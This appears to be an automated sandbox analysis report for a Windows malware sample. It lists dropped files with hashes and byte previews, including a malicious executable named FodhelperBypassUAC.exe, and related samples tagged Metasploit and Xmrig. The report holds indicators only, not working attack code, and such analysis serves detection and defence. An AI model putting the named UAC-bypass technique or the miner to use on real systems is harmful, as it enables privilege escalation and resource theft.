                                                                                                                                                7QiAmg58Jk.exeGet hashmaliciousMetasploit, Meterpreter, XmrigBrowse
                                                                                                                                                  LnK0dS8jcA.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                    file.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                      SecuriteInfo.com.Win64.Evo-gen.13032.15171.exeGet hashmaliciousXmrigBrowse

                                                                                                                                                        Created / dropped Files

                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_conhost.exe_cae244b47959cf7e86e80c9a22b39e4b8ae9c_1260788c_aaf6d04a-71b8-41f8-90bb-d5be49da444f\Report.wer

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):65536
                                                                                                                                                        Entropy (8bit):1.018985414666619
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:TY3NF9s0waFqsHh/1yHpHS2QXIDcQOc66cEvcw3mec1+HbHgrZ9n3g4sP8q9sOyR:TwNdwGqw0A+ViUjVkkozuiFLZ24lO89
                                                                                                                                                        MD5:ACEFBE921C122BC25639BDD1DA2EEC69
                                                                                                                                                        SHA1:71AC16A8D54DD0B0DB1C9E4D6EF0EC1210CF2837
                                                                                                                                                        SHA-256:C4142A259A4EDFC1E4925059CDB2B0E8F194B06F1671B6BF0518476373C1E181
                                                                                                                                                        SHA-512:67082E8E7CF6381A24317486911EBD3D896DC9980B925AF91380F3D105C02E13E969028FE643F2BCC50673838DB6F53C57790C1E14C320AA46A76277EFB0F680
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.1.3.4.4.9.5.8.8.2.7.7.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.8.1.3.4.5.0.4.0.0.7.7.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.a.f.6.d.0.4.a.-.7.1.b.8.-.4.1.f.8.-.9.0.b.b.-.d.5.b.e.4.9.d.a.4.4.4.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.7.a.a.d.a.b.c.-.b.8.8.a.-.4.e.f.6.-.b.3.3.0.-.b.6.7.b.5.0.3.1.5.8.f.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.o.n.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.C.O.N.H.O.S.T...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.f.c.-.0.0.0.1.-.0.0.1.3.-.7.f.0.d.-.c.c.9.f.0.7.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.5.2.a.7.2.7.4.a.0.b.4.f.9.4.9.3.6.3.2.0.6.0.f.e.2.5.9.9.3.a.2.e.f.2.4.f.e.8.2.7.!.c.o.n.h.o.s.t...e.x.e.....T.a.r.g.

                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER50A0.tmp.dmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Mon Oct 7 22:24:09 2024, 0x1205a4 type
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):329363
                                                                                                                                                        Entropy (8bit):3.1004599593917335
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:9KcyQVATdIjk4rp41CCqOft3+v0bTncSSWxjRI3plq5:9KcFshjqOV3Q0rSOIQ
                                                                                                                                                        MD5:0E202745E77F913D572ACE747946E054
                                                                                                                                                        SHA1:3D12335C02BA91C1040C81969156432B7433B2DB
                                                                                                                                                        SHA-256:74912CD91903CBDD01A19CAB139762715C10C9851A99D0C6C861F4B097F9BB52
                                                                                                                                                        SHA-512:2565DCD30CD160C2DDF6B4F677076D60A1023086983BE69A07FB4BF4B11F1DBC2F0FAA4188B19DA5A3BA1A95192361A6C4CBECD82F3C660B2E024F9F6D2CF19D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MDMP..a..... ........_.g....................................P...........t'...f..........`.......8...........T...........x)..............<(..........(*..............................................................................eJ.......*......Lw......................T............_.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER5295.tmp.WERInternalMetadata.xml

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):6616
                                                                                                                                                        Entropy (8bit):3.713694442017744
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:R6l7wVeJo5MrYALvlypDd89b3ws9f0L9m:R6lXJOAYALvf3wWf1
                                                                                                                                                        MD5:6D9A1AE7A88F86787BB54895EA0E6AA2
                                                                                                                                                        SHA1:065A6740DD617AB961A8F59F1B63C08E713D9B9A
                                                                                                                                                        SHA-256:844F480D267DBC4AC97DE026FEA4AFD4B4D9A44EF3EDDD1BFF2C64727843ACDF
                                                                                                                                                        SHA-512:CC2CA1681BCE3644C31003D01939187ECFD544CD9F2A3A5D13A6B83AF039233A39AF8403BCFD4B1309CA6D18674FDAAB3B6A07950B131F76B5E4E50ED0E3A4D1
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.4.0.<./.P.i.

                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER52C5.tmp.xml

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4829
                                                                                                                                                        Entropy (8bit):4.447757184787239
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:48:cvIwWl8zsbBJg771I9CdOOWpW8VYpYm8M4JmvM6F4yq8vVvMM7x4dg5Ld:uIjfXI7NdOv7VJJuMbWxMqx4yZd
                                                                                                                                                        MD5:446E17FC00C392F489512A5A82B6D2BB
                                                                                                                                                        SHA1:1D1A652E791B7CFD26E81AF3D3BE776506111518
                                                                                                                                                        SHA-256:20713EB656AD157499AB85385D6F0BB1E6412639F3697785AD450B109366E12D
                                                                                                                                                        SHA-512:16AE681818149A40A4C0C03AD9E7829C9691CA0C4F10E260C5F83B8390FA3CF117DF2DCD71146683B0432D54EA40491DA519395C2D33AD6AED80382AA92561A0
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533606" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                        C:\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):999
                                                                                                                                                        Entropy (8bit):4.966299883488245
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:Jd4T7gw4TchTGBLtKEHcHGuDyeHRuDye6MGFiP6euDyRtz:34T53VGLv8HGuDyeHRuDye6MGFiP6euy
                                                                                                                                                        MD5:24567B9212F806F6E3E27CDEB07728C0
                                                                                                                                                        SHA1:371AE77042FFF52327BF4B929495D5603404107D
                                                                                                                                                        SHA-256:82F352AD3C9B3E58ECD3207EDC38D5F01B14D968DA908406BD60FD93230B69F6
                                                                                                                                                        SHA-512:5D5E65FCD9061DADC760C9B3124547F2BABEB49FD56A2FD2FE2AD2211A1CB15436DB24308A0B5A87DA24EC6AB2A9B0C5242D828BE85BD1B2683F9468CE310904
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<software_identification_tag xmlns="http://standards.iso.org/iso/19770/-2/2009/schema.xsd">...<entitlement_required_indicator>true</entitlement_required_indicator>...<product_title>Windows 10 Pro</product_title>...<product_version>....<name>10.0.19041.1865</name>....<numeric>.....<major>10</major>.....<minor>0</minor>.....<build>19041</build>.....<review>1865</review>....</numeric>...</product_version>...<software_creator>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</software_creator>...<software_licensor>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</software_licensor>...<software_id>....<unique_id>Windows-10-Pro</unique_id>....<tag_creator_regid>regid.1991-06.com.microsoft</tag_creator_regid>...</software_id>...<tag_creator>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</tag_creator>..</software_identification_tag>..

                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\conhost.exe
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):539
                                                                                                                                                        Entropy (8bit):5.356620128167825
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12:Q3La/KDLI4MWuPXcp1WzAbDLI4MNepQZaDAWDLI4MWuCv:ML9E4KQMsXE4Np/E4Ks
                                                                                                                                                        MD5:7155C0B26CEC4BA9E8198691F0343F69
                                                                                                                                                        SHA1:0C2D3811CBDA0C349203F9AAAEEF47E6DB4C0FEF
                                                                                                                                                        SHA-256:59691880D1C39E4698FA89EFDA67A8EA171A039B0F6FC332EBE911F7EE790E23
                                                                                                                                                        SHA-512:62A480C5AD8A978E41D29B6C03666D30569A0A7A1F8D92DA201CE839FE4578782EAEF5EF4B675306668F5813B71F2467B52AE090BDCF5313C276631DBD6E9379
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\e7WMhx18XN.exe.log

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\e7WMhx18XN.exe
                                                                                                                                                        File Type:CSV text
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):425
                                                                                                                                                        Entropy (8bit):5.357964438493834
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
                                                                                                                                                        MD5:D8F8A79B5C09FCB6F44E8CFFF11BF7CA
                                                                                                                                                        SHA1:669AFE705130C81BFEFECD7CC216E6E10E72CB81
                                                                                                                                                        SHA-256:91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
                                                                                                                                                        SHA-512:C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..

                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):9713
                                                                                                                                                        Entropy (8bit):4.940954773740904
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
                                                                                                                                                        MD5:BA7C69EBE30EC7DA697D2772E36A746D
                                                                                                                                                        SHA1:DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
                                                                                                                                                        SHA-256:CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
                                                                                                                                                        SHA-512:E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2916
                                                                                                                                                        Entropy (8bit):5.4591212444106185
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:48:4wAzsSU4y4RQmFoUL5a+m9qr9t5/78NfpH4GxJZKaVEouYAgwd64rHLjtv2:jAzlHyIFKEg9qrh7KfpRJ5Eo9Adrx2
                                                                                                                                                        MD5:FCDF15235C353AA601AB8C5EC54185CA
                                                                                                                                                        SHA1:6662054154C423B42D43CA7A7327D6C2934742C8
                                                                                                                                                        SHA-256:A2C8FC4F7F8505F51C72F4D48F6DD962A4E77CDD3EED353DAE78C1364B7EF75D
                                                                                                                                                        SHA-512:7628BFC845AE4D618EE4E2930EB47F28936FB5112D5AC7C4F8610087AA58D973FD1A7F4AD38F2AD09AAF1C46D9E74EFC97136CDD358667B8A4FD038EE7782BB6
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:@...e................................................@..........H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.<...............i..VdqF...|...........System.Configuration4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\e7WMhx18XN.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):11776
                                                                                                                                                        Entropy (8bit):4.896940708816314
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:QXEmo++SLNbeeHGaH4/1LSRa53Q5tfMcpQdA:QXRo++SLFdX4lsa53FA
                                                                                                                                                        MD5:9EB62648C9CC2F1EDD3E9CEF736F9C5C
                                                                                                                                                        SHA1:6DDD252A86F1184C57F6C3624A36543DDE0E9FBC
                                                                                                                                                        SHA-256:991A39A81F86DA3EE222E4832EDFBEB6A2B9AC182243E868D34094669CFF3971
                                                                                                                                                        SHA-512:0F0A3B29384DC557D5EFA20D801159BA495AE63399FF3AF925BB4B099B1855FE3ACFB782871C2B50FC68032AD6CF70F307E87DC34321F1BE408C7C041D409E92
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........IhC.';C.';C.';J..;I.';S~&:A.';S~$:@.';S~#:I.';S~":P.';..&:F.';C.&;v.';...:B.';...;B.';..%:B.';RichC.';........................PE..d......f.........."....)..... .................@..........................................`..................................................).......`.......P...............p..0...p$..p...........................0#..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........@.......&..............@....pdata.......P.......(..............@..@.rsrc........`.......*..............@..@.reloc..0....p.......,..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.pdb

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\e7WMhx18XN.exe
                                                                                                                                                        File Type:MSVC program database ver 7.00, 4096*145 bytes
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):593920
                                                                                                                                                        Entropy (8bit):4.493232891296652
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:/7kehBikNGfD4nJt4A4nZARt4C4tk4n/LC4njXyCfhUswqLRp2/+2mpC8oTUtCm3:bznk+lkGvb62erFQLE+F9A
                                                                                                                                                        MD5:E8AA35340F0F52F080B13C3316DBD229
                                                                                                                                                        SHA1:458E9F4826C812B5F093CB4C49815AE1F428D7CF
                                                                                                                                                        SHA-256:E9FDD65F028BC2A77BE5D286B91405B3C55FB3A9346B8CC0FFD259FD7AF68DB1
                                                                                                                                                        SHA-512:67B310C050BD5A5CEBA586E46AE6C3C21FF8046943926DA89F5F6C745DFD897DF15510E935BD46A19A2A4A3769E464D68B2C5E62403D4F3A868335EA8A674452
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:Microsoft C/C++ MSF 7.00...DS...............8...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_12eepik3.duc.ps1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2qd5bc4b.asr.psm1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cwjyc1td.rp1.psm1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eaye15ce.2a3.psm1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fikclua5.tjo.psm1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iedaawhr.bpn.ps1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_islesptj.d2a.ps1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
